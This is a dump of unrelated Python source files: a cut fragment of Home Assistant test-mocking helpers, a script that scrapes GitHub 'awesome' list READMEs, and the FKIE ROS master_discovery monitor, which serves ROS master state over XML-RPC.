capability_attributes(self): """Info about capabilities.""" return self._handle("capability_attributes") @property def device_class(self): """Info how device should be classified.""" return self._handle("device_class") @property def device_info(self): """Info how it links to a device.""" return self._handle("device_info") @property def entity_category(self): """Return the entity category.""" return self._handle("entity_category") @property def entity_registry_enabled_default(self): """Return if the entity should be enabled when first added to the entity registry.""" return self._handle("entity_registry_enabled_default") @property def entity_registry_visible_default(self): """Return if the entity should be visible when first added to the entity registry.""" return self._handle("entity_registry_visible_default") @property def icon(self): """Return the suggested icon.""" return self._handle("icon") @property def name(self): """Return the name of the entity.""" return self._handle("name") @property def should_poll(self): """Return the ste of the polling.""" return self._handle("should_poll") @property def state(self): """Return the state of the entity.""" return self._handle("state") @property def supported_features(self): """Info about supported features.""" return self._handle("supported_features") @property def unique_id(self): """Return the unique ID of the entity.""" return self._handle("unique_id") @property def unit_of_measurement(self): """Info on the units the entity state is in.""" return self._handle("unit_of_measurement") def _handle(self, attr): """Return attribute value.""" if attr in self._values: return self._values[attr] return getattr(super(), attr) @contextmanager def mock_storage(data=None): """Mock storage. Data is a dict {'key': {'version': version, 'data': data}} Written data will be converted to JSON to ensure JSON parsing works. """ if data is None: data = {} orig_load = storage.Store._async_load async def mock_async_load(store): """Mock version of load.""" if store._data is None: # No data to load if store.key not in data: return None mock_data = data.get(store.key) if "data" not in mock_data or "version" not in mock_data: _LOGGER.error('Mock data needs "version" and "data"') raise ValueError('Mock data needs "version" and "data"') store._data = mock_data # Route through original load so that we trigger migration loaded = await orig_load(store) _LOGGER.info("Loading data for %s: %s", store.key, loaded) return loaded def mock_write_data(store, path, data_to_write): """Mock version of write data.""" # To ensure that the data can be serialized _LOGGER.info("Writing data to %s: %s", store.key, data_to_write) raise_contains_mocks(data_to_write) data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder)) async def mock_remove(store): """Remove data.""" data.pop(store.key, None) with patch( "homeassistant.helpers.storage.Store._async_load", side_effect=mock_async_load, autospec=True, ), patch( "homeassistant.helpers.storage.Store._write_data", side_effect=mock_write_data, autospec=True, ), patch( "homeassistant.helpers.storage.Store.async_remove", side_effect=mock_remove, autospec=True, ): yield data async def flush_store(store): """Make sure all delayed writes of a store are written.""" if store._data is None: return store._async_cleanup_final_write_listener() store._async_cleanup_delay_listener() await store._async_handle_write_data() async def get_system_health_info(hass, domain): """Get system health info.""" return await hass.data["system_health"][domain].info_callback(hass) def mock_integration(hass, module, built_in=True): """Mock an integration.""" integration = loader.Integration( hass, f"{loader.PACKAGE_BUILTIN}.{module.DOMAIN}" if built_in else f"{loader.PACKAGE_CUSTOM_COMPONENTS}.{module.DOMAIN}", None, module.mock_manifest(), ) def mock_import_platform(platform_name): raise ImportError( f"Mocked unable to import platform '{platform_name}'", name=f"{integration.pkg_path}.{platform_name}", ) integration._import_platform = mock_import_platform _LOGGER.info("Adding mock integration: %s", module.DOMAIN) hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module return integration def mock_entity_platform(hass, platform_path, module): """Mock a entity platform. platform_path is in form light.hue. Will create platform hue.light. """ domain, platform_name = platform_path.split(".") mock_platform(hass, f"{platform_name}.{domain}", module) def mock_platform(hass, platform_path, module=None): """Mock a platform. platform_path is in form hue.config_flow. """ domain, platform_name = platform_path.split(".") integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {}) module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {}) if domain not in integration_cache: mock_integration(hass, MockModule(domain)) _LOGGER.info("Adding mock integration platform: %s", platform_path) module_cache[platform_path] = module or Mock() def async_capture_events(hass, event_name): """Create a helper that captures events.""" events = [] @ha.callback def capture_events(event): events.append(event) hass.bus.async_listen(event_name, capture_events) return events @ha.callback def async_mock_signal(hass, signal): """Catch all dispatches to a signal.""" calls = [] @ha.callback def mock_signal_handler(*args): """Mock service call.""" calls.append(args) async_dispatcher_connect(hass, signal, mock_signal_handler) return calls def assert_lists_same(a, b): """Compare two lists, ignoring order. Check both that all items in a are in b and that all items in b are in a, otherwise assert_lists_same(["1", "1"], ["1", "2"]) could be True. """ assert len(a) == len(b) for i in a: assert i in b for i in b: assert i in a def raise_contains_mocks(val): """Raise for mocks.""" if isinstance(val, Mock): raise ValueError if isinstance(val, dict): for dict_value in val.values(): raise_contains_mocks(dict_value) if isinstance(val, list): for dict_value in val: raise_contains_mocks(dict_value)
parse_awesome_lists.py
import html.parser import requests import markdown2 import json import re import queue from urllib.parse import urlparse from multiprocessing import Process# Going parallel! from urllib.parse import urlparse from bs4 import BeautifulSoup number_of_processes = 3 def examine_each_awesome(awesome_urls): prefix = 'https://raw.githubusercontent.com' postfix = '/master/' def worker(process_id, urls): for url in urls: full_name = urlparse(url).path filename = './original_awesomes/' + full_name.split('/')[-1] + '.md' readme_url = prefix + full_name + postfix try: contents = request_content(readme_url + 'README.md') if contents == 'Not Found': contents = request_content(readme_url + 'readme.md') soup = generate_soup(contents) all_github_urls = generate_all_github_urls(soup) # for url in all_github_urls: # print(url) f = open(filename, 'w') f.write(contents) del f except: pass unit_size = int(len(awesome_urls) / number_of_processes) start = 0 procs = [] for i in range(number_of_processes): if start+unit_size < len(awesome_urls): items = awesome_urls[start:start+unit_size] else: items = awesome_urls[start:] start += unit_size p = Process(target=worker, args=(i, items)) procs.append(p) p.start() # Finish all the processes for p in procs: p.join() # def worker(thread_id, urls, out_q): # for url in urls: # content = request_content(url) # soup = generate_soup(content) # all_github_urls = generate_all_github_urls(soup) # out_q.put(all_github_urls) # print('Thread ' + str(thread_id) + ': ' + url + ': ' + str(len(all_github_urls))) # # unit_size = int(len(awesome_urls) / 20) # start = 0 # out_q = queue.Queue() # procs = [] # for i in range(20): # if start+unit_size < len(awesome_urls): # items = awesome_urls[start:start+unit_size] # else: # items = awesome_urls[start:] # # start += unit_size # # p = Process(target=worker, args=(i, items, out_q)) # procs.append(p) # p.start() # # for p in procs: # p.join() # # for i in range(20): # print(len(out_q.get())) def has_valid_github_url(a): return len(a) > 0 and a[0].get('href') and re.search('^https://github.com/[^/]+/[^/]+/?$', a[0]['href']) def generate_all_github_urls(soup): lis = soup.find_all('li') github_urls = set() for li in lis: a = li.find_all('a') if has_valid_github_url(a): github_urls.add(a[0]['href']) return list(github_urls) def generate_soup(content): content = content.replace('] (http', '](http') markdown = markdown2.Markdown() return BeautifulSoup(markdown.convert(content), 'html.parser') def request_content(url): return requests.get(url).content.decode('utf-8') def regenerate_hrefs(soup): prefix = 'https://github.com/chaconnewu/awesome-augmented/blob/master/awesomes/' lis = soup.find_all('li') github_urls = set() for li in lis: a = li.find_all('a') if has_valid_github_url(a): full_name = urlparse(a[0]['href']).path a[0]['href'] = prefix + full_name.split('/')[-1] + '.md' f = open('new.md', 'w') f.write(soup.prettify()) del f def main(): awesome_url = 'https://raw.githubusercontent.com/sindresorhus/awesome/master/readme.md' content = request_content(awesome_url) soup = generate_soup(content) awesome_urls = generate_all_github_urls(soup) examine_each_awesome(awesome_urls) regenerate_hrefs(soup) for url in awesome_urls: print(url) if __name__ == '__main__': main()
master_monitor.py
# Software License Agreement (BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of Fraunhofer nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. try: from SimpleXMLRPCServer import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler from SocketServer import ThreadingMixIn import cStringIO as io # python 2 compatibility except ImportError: from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler from socketserver import ThreadingMixIn import io try: from urlparse import urlparse # python 2 compatibility except ImportError: from urllib.parse import urlparse from datetime import datetime import getpass import roslib.network import roslib.message import rospy import socket import subprocess import sys import threading import time import traceback try: import xmlrpclib as xmlrpcclient # python 2 compatibility except ImportError: import xmlrpc.client as xmlrpcclient from . import interface_finder from .common import masteruri_from_ros, get_hostname from .common import gen_pattern from .filter_interface import FilterInterface from .master_info import MasterInfo try: # to avoid the problems with autodoc on ros.org/wiki site from fkie_multimaster_msgs.msg import LinkState, LinkStatesStamped, MasterState, ROSMaster, SyncMasterInfo, SyncTopicInfo, SyncServiceInfo from fkie_multimaster_msgs.srv import DiscoverMasters, GetSyncInfo except: pass class MasterConnectionException(Exception): ''' The exception class to handle the connection problems with ROS Master. ''' pass def _succeed(args): code, msg, val = args if code != 1: raise Exception("remote call failed: %s" % msg) return val class RPCThreading(ThreadingMixIn, SimpleXMLRPCServer): # When inheriting from ThreadingMixIn for threaded connection behavior, you should explicitly # declare how you want your threads to behave on an abrupt shutdown. The ThreadingMixIn class # defines an attribute daemon_threads, which indicates whether or not the server should wait # for thread termination. You should set the flag explicitly if you would like threads to # behave autonomously; the default is False, meaning that Python will not exit until all # threads created by ThreadingMixIn have exited. daemon_threads = True def __init__(self, addr, requestHandler=SimpleXMLRPCRequestHandler, logRequests=True, allow_none=False, encoding=None, bind_and_activate=True): SimpleXMLRPCServer.__init__(self, addr, requestHandler=requestHandler, logRequests=logRequests, allow_none=allow_none, encoding=encoding, bind_and_activate=bind_and_activate) class RPCThreadingV6(ThreadingMixIn, SimpleXMLRPCServer): address_family = socket.AF_INET6 # When inheriting from ThreadingMixIn for threaded connection behavior, you should explicitly # declare how you want your threads to behave on an abrupt shutdown. The ThreadingMixIn class # defines an attribute daemon_threads, which indicates whether or not the server should wait # for thread termination. You should set the flag explicitly if you would like threads to # behave autonomously; the default is False, meaning that Python will not exit until all # threads created by ThreadingMixIn have exited. daemon_threads = True def __init__(self, addr, requestHandler=SimpleXMLRPCRequestHandler, logRequests=True, allow_none=False, encoding=None, bind_and_activate=True): SimpleXMLRPCServer.__init__(self, addr, requestHandler=requestHandler, logRequests=logRequests, allow_none=allow_none, encoding=encoding, bind_and_activate=bind_and_activate) class MasterMonitor(object): ''' This class provides methods to get the state from the ROS master using his RPC API and test for changes. Furthermore an XML-RPC server will be created to offer the complete current state of the ROS master by one method call. :param rpcport: the port number for the XML-RPC server :type rpcport: int :param do_retry: retry to create XML-RPC server :type do_retry: bool :see: :mod:`fkie_master_discovery.master_monitor.MasterMonitor.getCurrentState()`, respectively :mod:`fkie_master_discovery.master_monitor.MasterMonitor.updateState()` :RPC Methods: :mod:`fkie_master_discovery.master_monitor.MasterMonitor.getListedMasterInfo()` or :mod:`fkie_master_discovery.master_monitor.MasterMonitor.getMasterContacts()` as RPC: ``masterInfo()`` and ``masterContacts()`` ''' MAX_PING_SEC = 10.0 ''' The time to update the node URI, ID or service URI (Default: ``10.0``)''' INTERVAL_UPDATE_LAUNCH_URIS = 15.0 def __init__(self, rpcport=11611, do_retry=True, ipv6=False, rpc_addr=''): ''' Initialize method. Creates an XML-RPC server on given port and starts this in its own thread. :param rpcport: the port number for the XML-RPC server :type rpcport: int :param do_retry: retry to create XML-RPC server :type do_retry: bool :param ipv6: Use ipv6 :type ipv6: bool ''' self._state_access_lock = threading.RLock() self._create_access_lock = threading.RLock() self._lock = threading.RLock() self.__masteruri = masteruri_from_ros() self.__new_master_state = None self.__masteruri_rpc = None self.__mastername = None self.__cached_nodes = dict() self.__cached_services = dict() self.ros_node_name = str(rospy.get_name()) if rospy.has_param('~name'): self.__mastername = rospy.get_param('~name') self.__mastername = self.getMastername() rospy.set_param('/mastername', self.__mastername) self.__master_state = None '''the current state of the ROS master''' self.rpcport = rpcport '''the port number of the RPC server''' self._printed_errors = dict() self._last_clearup_ts = time.time() self._master_errors = list() # Create an XML-RPC server self.ready = False while not self.ready and not rospy.is_shutdown(): try: RPCClass = RPCThreading if ipv6: RPCClass = RPCThreadingV6 self.rpcServer = RPCClass((rpc_addr, rpcport), logRequests=False, allow_none=True) rospy.loginfo("Start RPC-XML Server at %s", self.rpcServer.server_address) self.rpcServer.register_introspection_functions() self.rpcServer.register_function(self.getListedMasterInfo, 'masterInfo') self.rpcServer.register_function(self.getListedMasterInfoFiltered, 'masterInfoFiltered') self.rpcServer.register_function(self.getMasterContacts, 'masterContacts') self.rpcServer.register_function(self.getMasterErrors, 'masterErrors') self.rpcServer.register_function(self.getCurrentTime, 'getCurrentTime') self.rpcServer.register_function(self.setTime, 'setTime') self.rpcServer.register_function(self.getTopicsMd5sum, 'getTopicsMd5sum') self.rpcServer.register_function(self.getUser, 'getUser') self._rpcThread = threading.Thread(target=self.rpcServer.serve_forever) self._rpcThread.setDaemon(True) self._rpcThread.start() self.ready = True except socket.error as e: if not do_retry: raise Exception("Error while start RPC-XML server on port %d: %s\nIs a Node Manager already running?" % (rpcport, e)) rospy.logwarn("Error while start RPC-XML server on port %d: %s\nTry again..." % (rpcport, e)) time.sleep(1) except: print(traceback.format_exc()) if not do_retry: raise self._master = xmlrpcclient.ServerProxy(self.getMasteruri()) # Hide parameter self._re_hide_nodes = gen_pattern(rospy.get_param('~hide_nodes', []), 'hide_nodes') self._re_hide_topics = gen_pattern(rospy.get_param('~hide_topics', []), 'hide_topics') self._re_hide_services = gen_pattern(rospy.get_param('~hide_services', []), 'hide_services') # === UPDATE THE LAUNCH URIS Section === # subscribe to get parameter updates rospy.loginfo("Subscribe to parameter `/roslaunch/uris`") self.__mycache_param_server = rospy.impl.paramserver.get_param_server_cache() # HACK: use own method to get the updates also for parameters in the subgroup self.__mycache_param_server.update = self.__update_param # first access, make call to parameter server self._update_launch_uris_lock = threading.RLock() self.__launch_uris = {} code, msg, value = self._master.subscribeParam(self.ros_node_name, rospy.get_node_uri(), '/roslaunch/uris') # the new timer will be created in self._update_launch_uris() self._timer_update_launch_uris = None if code == 1: for k, v in value.items(): self.__launch_uris[roslib.names.ns_join('/roslaunch/uris', k)] = v self._update_launch_uris() # === END: UPDATE THE LAUNCH URIS Section === def __update_param(self, key, value): # updates the /roslaunch/uris parameter list with self._update_launch_uris_lock: try: if value: self.__launch_uris[key] = value else: del self.__launch_uris[key] except: pass def shutdown(self): ''' Shutdown the RPC Server. ''' if self._timer_update_launch_uris is not None: try: self._timer_update_launch_uris.cancel() except Exception: pass if hasattr(self, 'rpcServer'): if self._master is not None: rospy.loginfo("Unsubscribe from parameter `/roslaunch/uris`") try: self._master.unsubscribeParam(self.ros_node_name, rospy.get_node_uri(), '/roslaunch/uris') except Exception as e: rospy.logwarn("Error while unsubscribe from `/roslaunch/uris`: %s" % e) rospy.loginfo("shutdown own RPC server") self.rpcServer.shutdown() del self.rpcServer.socket del self.rpcServer def is_running(self): return hasattr(self, 'rpcServer') def _update_launch_uris(self, params={}): with self._update_launch_uris_lock: if params: self.__launch_uris = params try: socket.setdefaulttimeout(3.0) for key, value in self.__launch_uris.items(): try: # contact the launch server launch_server = xmlrpcclient.ServerProxy(value) c, m, pid = launch_server.get_pid() except: try: # remove the parameter from parameter server on error master = xmlrpcclient.ServerProxy(self.getMasteruri()) master.deleteParam(self.ros_node_name, key) except: pass finally: socket.setdefaulttimeout(None) # create the new timer if not rospy.is_shutdown(): self._timer_update_launch_uris = threading.Timer(self.INTERVAL_UPDATE_LAUNCH_URIS, self._update_launch_uris) self._timer_update_launch_uris.start() def _getNodePid(self, nodes): ''' Gets process id of the node. This method blocks until the info is retrieved or socket timeout is reached (0.7 seconds). :param nodename: the name of the node :type nodename: str :param uri: the uri of the node :type uri: str ''' for (nodename, uri) in nodes.items(): if uri is not None: pid = None try: with self._lock: if nodename in self.__cached_nodes: if time.time() - self.__cached_nodes[nodename][2] < self.MAX_PING_SEC: return socket.setdefaulttimeout(0.7) node = xmlrpcclient.ServerProxy(uri) pid = _succeed(node.getPid(self.ros_node_name)) except (Exception, socket.error) as e: with self._lock: self._limited_log(nodename, "can't get PID: %s" % str(e), level=rospy.DEBUG) master = xmlrpcclient.ServerProxy(self.getMasteruri()) code, message, new_uri = master.lookupNode(self.ros_node_name, nodename) with self._lock: self.__new_master_state.getNode(nodename).uri = None if (code == -1) else new_uri if code == -1: self._limited_log(nodename, "can't update contact information. ROS master responds with: %s" % message) try: del self.__cached_nodes[nodename] except: pass else: with self._lock: self.__new_master_state.getNode(nodename).pid = pid self.__cached_nodes[nodename] = (uri, pid, time.time()) # print "_getNodePid _lock RET", threading.current_thread() finally: socket.setdefaulttimeout(None) def _getServiceInfo(self, services): ''' Gets service info through the RPC interface of the service. This method blocks until the info is retrieved or socket timeout is reached (0.5 seconds). :param service: the name of the service :type service: str :param uri: the uri of the service :type uri: str ''' for (service, uri) in services.items(): with self._lock: if service in self.__cached_services: if time.time() - self.__cached_services[service][2] < self.MAX_PING_SEC: return if uri is not None: dest_addr = dest_port = None try: dest_addr, dest_port = rospy.parse_rosrpc_uri(uri) except: continue # raise ROSServiceException("service [%s] has an invalid RPC URI [%s]"%(service, uri)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: # connect to service and probe it to get the headers s.settimeout(0.5) s.connect((dest_addr, dest_port)) header = {'probe': '1', 'md5sum': '*', 'callerid': self.ros_node_name, 'service': service} roslib.network.write_ros_handshake_header(s, header) buf = io.StringIO() if sys.version_info < (3, 0) else io.BytesIO() stype = roslib.network.read_ros_handshake_header(s, buf, 2048) with self._lock: self.__new_master_state.getService(service).type = stype['type'] self.__cached_services[service] = (uri, stype['type'], time.time()) except socket.error: with self._lock: try: del self.__cached_services[service] except: pass # raise ROSServiceIOException("Unable to communicate with service [%s], address [%s]"%(service, uri)) except: with self._lock: self._limited_log(service, "can't get service type: %s" % traceback.format_exc(), level=rospy.DEBUG) with self._lock: try: del self.__cached_services[service] except: pass pass finally: if s is not None: s.close() def getListedMasterInfo(self): ''' :return: a extended ROS Master State. :rtype: :mod:`fkie_master_discovery.master_info.MasterInfo.listedState()` for result type ''' t = str(time.time()) result = (t, t, self.getMasteruri(), str(self.getMastername()), [], [], [], [], [], []) if not (self.__master_state is None): try: with self._state_access_lock: result = self.__master_state.listedState() except: print(traceback.format_exc()) return result def getListedMasterInfoFiltered(self, filter_list): ''' :return: a extended filtered ROS Master State. :rtype: :mod:`fkie_master_discovery.master_info.MasterInfo.listedState()` for result type ''' t = str(time.time()) result = (t, t, self.getMasteruri(), str(self.getMastername()), [], [], [], [], [], []) if not (self.__master_state is None): try: with self._state_access_lock: fi = FilterInterface.from_list(filter_list) fi.set_hide_pattern(self._re_hide_nodes, self._re_hide_topics, self._re_hide_services) result = self.__master_state.listedState(fi) except: print(traceback.format_exc()) return result def getCurrentState(self): ''' :return: The current ROS Master State :rtype: :mod:`fkie_master_discovery.master_info.MasterInfo` or ``None`` ''' with self._state_access_lock: return self.__master_state def updateState(self, clear_cache=False): ''' Gets state from the ROS Master through his RPC interface. :param clear_cache: The URI of nodes and services will be cached to reduce the load. If remote hosted nodes or services was restarted, the cache must be cleared! The local nodes will be updated periodically after :mod:`fkie_master_discovery.master_monitor.MasterMonitor.MAX_PING_SEC`. :type clear_cache: bool (Default: ``False``) :rtype: :mod:`fkie_master_discovery.master_info.MasterInfo` :raise: ``MasterConnectionException``, if not complete information was get from the ROS master. ''' with self._create_access_lock: now = time.time() threads = [] try: self._lock.acquire(True) if clear_cache: self.__cached_nodes = dict() self.__cached_services = dict() socket.setdefaulttimeout(5) self.__new_master_state = master_state = MasterInfo(self.getMasteruri(), self.getMastername()) # update master state master = self._master # master = xmlrpclib.ServerProxy(self.getMasteruri()) # get topic types code, message, topicTypes = master.getTopicTypes(self.ros_node_name) # convert topicType list to the dict topicTypesDict = {} for topic, type in topicTypes: topicTypesDict[topic] = type # get system state code, message, state = master.getSystemState(self.ros_node_name) # add published topics for t, l in state[0]: master_state.topics = t for n in l: master_state.nodes = n master_state.getNode(n).publishedTopics = t master_state.getTopic(t).publisherNodes = n master_state.getTopic(t).type = topicTypesDict.get(t, 'None') # add subscribed topics for t, l in state[1]: master_state.topics = t for n in l: master_state.nodes = n master_state.getNode(n).subscribedTopics = t master_state.getTopic(t).subscriberNodes = n master_state.getTopic(t).type = topicTypesDict.get(t, 'None') # add services services = dict() tmp_slist = [] # multi-call style xmlrpc to lock up the service uri param_server_multi = xmlrpcclient.MultiCall(master) for t, l in state[2]: master_state.services = t for n in l: master_state.nodes = n master_state.getNode(n).services = t service = master_state.getService(t) service.serviceProvider = n if service.name in self.__cached_services: service.uri = self.__cached_services[service.name][0] service.type = self.__cached_services[service.name][1] if service.isLocal and time.time() - self.__cached_services[service.name][2] > self.MAX_PING_SEC: services[service.name] = service.uri else: tmp_slist.append(service) param_server_multi.lookupService(self.ros_node_name, t) try: r = param_server_multi() for (code, msg, uri), service in zip(r, tmp_slist): if code == 1: service.uri = uri if service.isLocal: services[service.name] = uri else: self.__cached_services[service.name] = (uri, None, time.time()) else: with self._lock: self._limited_log(service.name, "can't get contact information. ROS master responds with: %s" % msg) except: traceback.print_exc() if services: pidThread = threading.Thread(target=self._getServiceInfo, args=((services,))) pidThread.start() threads.append(pidThread) # get additional node information nodes = dict() try: # multi-call style xmlrpc to loock up the node uri param_server_multi = xmlrpcclient.MultiCall(master) tmp_nlist = [] for name, node in master_state.nodes.items(): if node.name in self.__cached_nodes: node.uri = self.__cached_nodes[node.name][0] node.pid = self.__cached_nodes[node.name][1] if node.isLocal and time.time() - self.__cached_nodes[node.name][2] > self.MAX_PING_SEC: nodes[node.name] = node.uri else: # 'print "request node:", node.name tmp_nlist.append(node) param_server_multi.lookupNode(self.ros_node_name, name) r = param_server_multi() for (code, msg, uri), node in zip(r, tmp_nlist): if code == 1: node.uri = uri if node.isLocal: nodes[node.name] = uri else: self.__cached_nodes[node.name] = (uri, None, time.time()) else: with self._lock: self._limited_log(node.name, "can't get contact information. ROS master responds with: %s" % msg) except: traceback.print_exc() if nodes: # get process id of the nodes pidThread = threading.Thread(target=self._getNodePid, args=((nodes,))) pidThread.start() threads.append(pidThread) master_state.timestamp = now except socket.error as e: if isinstance(e, tuple): (errn, msg) = e if errn not in [100, 101, 102]: formatted_lines = traceback.format_exc().splitlines() raise MasterConnectionException(formatted_lines[-1]) else: raise MasterConnectionException(traceback.format_exc(1)) except: formatted_lines = traceback.format_exc().splitlines() raise MasterConnectionException(formatted_lines[-1]) finally: self._lock.release() socket.setdefaulttimeout(None) # wait for all threads are finished while threads: th = threads.pop() if th.is_alive(): th.join() del th if time.time() - self._last_clearup_ts > 300: self._last_clearup_ts = time.time() self._clearup_cached_logs() return master_state def _limited_log(self, provider, msg, level=rospy.WARN): if provider not in self._printed_errors: self._printed_errors[provider] = dict() if msg not in self._printed_errors[provider]: self._printed_errors[provider][msg] = time.time() if level == rospy.DEBUG: rospy.logdebug("MasterMonitor[%s]: %s" % (provider, msg)) elif level == rospy.INFO: rospy.loginfo("MasterMonitor[%s]: %s" % (provider, msg)) elif level == rospy.WARN: rospy.logwarn("MasterMonitor[%s]: %s" % (provider, msg)) elif level == rospy.ERROR: rospy.logerr("MasterMonitor[%s]: %s" % (provider, msg)) elif level == rospy.FATAL: rospy.logfatal("MasterMonitor[%s]: %s" % (provider, msg)) def _clearup_cached_logs(self, age=300): cts = time.time() with self._lock: for p, msgs in list(self._printed_errors.items()): for msg, ts in list(msgs.items()): if cts - ts > age: del self._printed_errors[p][msg] if not self._printed_errors[p]: del self._printed_errors[p] def updateSyncInfo(self): ''' This method can be called to update the origin ROS master URI of the nodes and services in new ``master_state``. This is only need, if a synchronization is running. The synchronization service will be detect automatically by searching for the service ending with ``get_sync_info``. The method will be called by :mod:`fkie_master_discovery.master_monitor.MasterMonitor.checkState()`. ''' # 'print "updateSyncInfo _create_access_lock try...", threading.current_thread() def getNodeuri(nodename, publisher, subscriber, services): for p in publisher: if nodename == p.node: return p.nodeuri for p in subscriber: if nodename == p.node: return p.nodeuri for s in services: if nodename == s.node: return s.nodeuri return None with self._create_access_lock: master_state = self.__new_master_state sync_info = None # get synchronization info, if sync node is running # to determine the origin ROS MASTER URI of the nodes for name, service in master_state.services.items(): if service.name.endswith('get_sync_info'): if get_hostname(self.getMasteruri()) == get_hostname(service.uri): socket.setdefaulttimeout(3) get_sync_info = rospy.ServiceProxy(service.name, GetSyncInfo) try: sync_info = get_sync_info() except rospy.ServiceException as e: rospy.logwarn("ERROR Service call 'get_sync_info' failed: %s", str(e)) finally: socket.setdefaulttimeout(None) # update the origin ROS MASTER URI of the nodes, if sync node is running if sync_info: for m in sync_info.hosts: for n in m.nodes: try: # TODO: add nodeuri to the nodes (needs changes in the MSG definitions) # set the sync node only if it has the same uri nuri = getNodeuri(n, m.publisher, m.subscriber, m.services) state_node = master_state.getNode(n) if state_node is not None and (state_node.uri == nuri or nuri is None): state_node.masteruri = m.masteruri except: pass for s in m.services: try: state_service = master_state.getService(s.service) if state_service is not None and state_service.uri == s.serviceuri: state_service.masteruri = m.masteruri except: pass def getMasteruri(self): ''' Requests the ROS master URI from the ROS master through the RPC interface and returns it. :return: ROS master URI :rtype: str or ``None`` ''' code = -1 if self.__masteruri_rpc is None: master = xmlrpcclient.ServerProxy(self.__masteruri) code, message, self.__masteruri_rpc = master.getUri(self.ros_node_name) return self.__masteruri_rpc if code >= 0 or self.__masteruri_rpc is not None else self.__masteruri def getMastername(self): ''' Returns the name of the master. If no name is set, the hostname of the ROS master URI will be extracted. :return: the name of the ROS master :rtype: str or ``None`` ''' if self.__mastername is None: try: self.__mastername = get_hostname(self.getMasteruri()) try: master_port = urlparse(self.__masteruri).port if master_port != 11311: self.__mastername = '%s_%d' % (self.__mastername, master_port) except: pass except: pass return self.__mastername def getMasterContacts(self): ''' The RPC method called by XML-RPC server to request the master contact information. :return: (``timestamp of the ROS master state``, ``ROS master URI``, ``master name``, ``name of this service``, ``URI of this RPC server``) :rtype: (str, str, str, str, str) ''' t = 0 if self.__master_state is not None: with self._state_access_lock: t = self.__master_state.timestamp return ('%.9f' % t, str(self.getMasteruri()), str(self.getMastername()), self.ros_node_name, roslib.network.create_local_xmlrpc_uri(self.rpcport)) def getMasterErrors(self): ''' The RPC method called by XML-RPC server to request the occured network errors. :return: (``ROS master URI``, ``list with errors``) :rtype: (str, [str]) ''' return (str(self.getMasteruri()), self._master_errors) def getCurrentTime(self): ''' The RPC method called by XML-RPC server to request the current host time. :return: (``ROS master URI``, ``current time``) :rtype: (str, float) ''' return (str(self.getMasteruri()), time.time()) def setTime(self, timestamp): ''' The RPC method called by XML-RPC server to set new host time. :param timestamp: UNIX timestamp :type timestamp: float :return: (``ROS master URI``, ``current time``) :rtype: (str, float) ''' dtime = datetime.fromtimestamp(timestamp) args = ['sudo', '-n', '/bin/date', '-s', '%s' % dtime] rospy.loginfo('Set time: %s' % args) subp = subprocess.Popen(args, stderr=subprocess.PIPE) success = True result_err = '' if subp.stderr is not None: result_err = subp.stderr.read() if result_err: success = False return (str(self.getMasteruri()), success, time.time(), result_err) def getTopicsMd5sum(self, topic_types): ''' :return: a list with topic type and current md5sum. - ``topic types`` is of the form ``[ (topic1, md5sum1) ... ]`` :rtype: list ''' topic_list = [] for ttype in topic_types: try: entry = (ttype, roslib.message.get_message_class(ttype)._md5sum) topic_list.append(entry) except Exception as err: rospy.logwarn(err) return topic_list def getUser(self): ''' The RPC method called by XML-RPC server to request the user name used to launch the master_discovery. :return: (``ROS master URI``, ``user name``) :rtype: (str, str) ''' return (str(self.getMasteruri()), getpass.getuser()) def checkState(self, clear_cache=False): ''' Gets the state from the ROS master and compares it to the stored state. :param clear_cache: The URI of nodes and services will be cached to reduce the load. If remote hosted nodes or services was restarted, the cache must be cleared! The local nodes will be updated periodically after :mod:`fkie_master_discovery.master_monitor.MasterMonitor.MAX_PING_SEC`. :type clear_cache: bool (Default: ``False``) :return: ``True`` if the ROS master state is changed :rtype: bool ''' result = False s = self.updateState(clear_cache) with self._create_access_lock: do_update = False with self._state_access_lock: if s != self.__master_state: do_update = True if self.__master_state is not None and s.timestamp < self.__master_state.timestamp: do_update = True result = True timejump_msg = "Timejump into past detected! Restart all ROS nodes, includes master_discovery, please!" rospy.logwarn(timejump_msg) if timejump_msg not in self._master_errors: self._master_errors.append(timejump_msg) if do_update: self.updateSyncInfo() with self._state_access_lock: # test for local changes ts_local = self.__new_master_state.timestamp_local if self.__master_state is not None and not self.__master_state.has_local_changes(s): ts_local = self.__master_state.timestamp_local self.__master_state = self.__new_master_state self.__master_state.timestamp_local = ts_local result = True self.__master_state.check_ts = self.__new_master_state.timestamp return result def reset(self): ''' Sets the master state to ``None``. ''' with self._state_access_lock: if self.__master_state is not None: del self.__master_state self.__master_state = None def update_master_errors(self, error_list): self._master_errors = list(error_list)
exampleApp12.py
